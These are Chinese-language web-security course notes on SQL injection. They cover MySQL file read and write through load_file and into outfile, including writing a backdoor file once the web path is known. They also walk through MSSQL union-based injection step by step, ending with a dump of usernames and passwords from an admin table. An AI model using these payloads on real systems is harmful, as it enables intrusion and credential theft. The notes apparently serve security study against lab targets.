小迪安全笔记-25
小迪安全笔记-25
Kn1ght第25天:WEB攻防-通用漏洞_SQL读写注入_MYSQL_MSSQL_PostgreSQL
知识点
1、SQL注入-MYSQL数据库
2、SQL注入-MSSQL数据库
3、SQL注入-PostgreSQL数据库
详细点
Access数据库无高权限注入点-只能猜解,还是暴力猜解
MYSQL,PostgreSQL,MSSQL的高权限注入点—可升级读写执行等,还需要看具体有没有限制,能不能进行执行等等。
mysql自带的读写文件函数:
读取文件:select load_file(‘d:/w.txt’);
写入文件:select ‘xxx’ into outfile ‘d:/1.txt’; 或者select ‘xxx’ into dumpfile ‘d:/1.txt’;
MYSQL-root高权限利用漏洞读写注入
读取文件:
UNION SELECT 1,load_file(‘d:/w.txt’),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
写入文件:
UNION SELECT 1,’yyy’,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 into outfile ‘d:/www.txt‘
读取关键文件,可以再搜索关键函数等
读取关键配置文件:
http://localhost:81/book/news.php?id=1 UNION SELECT 1,load_file(‘D:/install/phpstudy_pro/WWW/book/config/conn.php’),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
Phpinfo搜索语法:inurl:phpinfo,phpinfo会暴露网站路径
获取网站路径的方式:phpinfo、网站报错信息、字典、loadfile()读取配置性文件等。
loadfile()常用路径参考:
https://blog.csdn.net/god_7z1/article/details/8725541
获取到网站路径后,写入后门代码:
http://127.0.0.1:8081/web/mysql/news.php
?id=1 UNION SELECT 1,’‘,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 into outfile ‘D:/install/phpstudy_pro/WWW/book/1.php’
PostgreSQL-高权限读写注入
这一篇也就差不多了:
https://www.freebuf.com/sectool/249371.html
还算详细
SQL Server -sa高权限读写执行注入
① 测列数:
http://xxx:41681/news.asp?id=2 order by 4 页面显示正常
http://xxx:41681/news.asp?id=2 order by 5 页面显示错误
说明列数是4
②测显位
- 分别给几个null加上’ ‘
http://xxx:41681/news.asp?id=2 and 1=2 union all select ‘null’,null,null,null
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,’null’,null,null
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,null,’null’,null 位置3爆出显位
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,null,null,’null’
③ 获取信息:
获取版本信息:@@version
获取当前数据库名字:db_name()
获取当前用户名:user、system_user,current_user,user_name都可以
获取服务器主机信息:@@SERVERNAME
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,null,@@version,null //获取版本信息–SQL Server2005 - 9.00.1399.06
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,null,db_name(),null //获取数据库名–mozhe_db_v2
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,null,user,null //获取当前用户–dbo
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,null,@@SERVERNAME ,null //获取主机信息–MOBAN9527\SQL…
④查数据库下的表名:(数据库mozhe_db_v2)
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype=’u’),null,null
查数据库下除了“manage”表的其它表:
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype=’u’ and name not in (‘manage’)),null,null
继续查询除了“manage”和“announcement”表的其它表:
http://xxx:41681/news.asp?id=2 and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype=’u’ and name not in ((‘manage’),(‘announcement’)) ,null,null
⑤ 因为manage数据库比较关键,查询manage下的列名:
and 1=2 union all select null,(select top 1 col_name(object_id(‘manage’),1) from sysobjects),null,null
and 1=2 union all select null,(select top 1 col_name(object_id(‘manage’),2) from sysobjects),null,null
and 1=2 union all select null,(select top 1 col_name(object_id(‘manage’),3) from sysobjects),null,null
and 1=2 union all select null,(select top 1 col_name(object_id(‘manage’),4) from sysobjects),null,null
⑥ 获取数据:用户名、密码
and 1=2 union all select null,username, password ,null from manage
